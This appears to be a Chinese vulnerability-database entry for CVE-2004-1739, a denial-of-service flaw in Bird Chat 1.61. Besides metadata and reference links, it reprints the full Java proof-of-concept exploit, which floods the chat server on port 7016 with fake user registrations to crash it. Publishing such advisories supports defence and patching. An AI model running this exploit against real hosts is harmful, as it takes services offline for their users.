Bird Chat远程服务拒绝漏洞

Bird Chat远程服务拒绝漏洞

漏洞ID 1108142 漏洞类型 其他
发布时间 2004-08-26 更新时间 2005-10-20
图片[1]-Bird Chat远程服务拒绝漏洞-安全小百科CVE编号 CVE-2004-1739
图片[2]-Bird Chat远程服务拒绝漏洞-安全小百科CNNVD-ID CNNVD-200408-212
漏洞平台 Windows_x86 CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/420
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200408-212
|漏洞详情
BirdChat1.61版本存在漏洞。远程攻击者借助无效的用户导致服务拒绝(崩溃)。
|漏洞EXP
/*
    Bird Chat 1.61 - Denial Of Service - Proof Of Concept
    Coded by: Donato Ferrante
*/



import java.net.Socket;
import java.net.InetAddress;
import java.net.ConnectException;
import java.net.SocketTimeoutException;
import java.io.OutputStream;
import java.io.InputStream;







public class BirdChat161_DoS_poc {



private final static int MAX_CONNECTION = 16;
private final static int PORT = 7016;
private final static String VERSION = "0.1.0";



public static void main(String [] args){



  System.out.println(
                     "nnBird Chat 1.61 - Denial Of Service - Proof Of Conceptn" +
                     "Version: " + VERSION + "nn"                 +
                     "coded by: Donato Ferranten"                  +
                     "e-mail:   [email protected]"            +
                     "web:      www.autistici.org/fdonato;nn"
                    );


    String host = "localhost";

        try{

            if(args.length != 1)
                usage();

                host = args[0];

        }catch(Exception e){usage();}
    
        try{


            int i = 1,
                var = 0;


           while(i++ <= MAX_CONNECTION){

            try{

               String err = "";
               int port = PORT;
               InetAddress addr = InetAddress.getByName(host);
               Socket socket = new Socket(addr, port);
               socket.setSoTimeout(3000);



               InputStream stream = socket.getInputStream();

                  int line = stream.read();
                   while(line != -1){

                       if(line == '?'){
                           break;
                       }

                       line = stream.read();

                   }


               OutputStream outStream = socket.getOutputStream();
               outStream.write(("*user=fake_user0" + ++var + "n").getBytes());


                int count = 0;
               line = stream.read();
                    while(true){

                       line = stream.read();

                        if(line == 'n')
                           count++;

                       if(count >= 3)
                           break;
               }


            }catch(SocketTimeoutException ste){break;}
            catch(ConnectException ce){System.err.println(ce); continue;}
        }


        }catch(Exception e){System.err.println(e);}

        System.out.println("nBird Chat - Denial Of Service - Proof_Of_Concept terminated.nn");
    }







    private static void usage(){

        System.out.println("Usage: java BirdChat161_DoS_poc <host>nn");    
        System.exit(-1);
    }
}


// milw0rm.com [2004-08-26]
|参考资料

来源:SECUNIA
名称:12365
链接:http://secunia.com/advisories/12365
来源:XF
名称:bird-chat-dos(17080)
链接:http://xforce.iss.net/xforce/xfdb/17080
来源:BID
名称:11010
链接:http://www.securityfocus.com/bid/11010
来源:www.autistici.org
链接:http://www.autistici.org/fdonato/advisory/BirdChat1.61-adv.txt
来源:BUGTRAQ
名称:20040823DoSinBirdChat1.61
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=109327938924287&w;=2

相关推荐: DansGuardian Hex Encoded File Extension URI Content Filter Bypass Vulnerability

DansGuardian Hex Encoded File Extension URI Content Filter Bypass Vulnerability 漏洞ID 1098267 漏洞类型 Input Validation Error 发布时间 2004…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享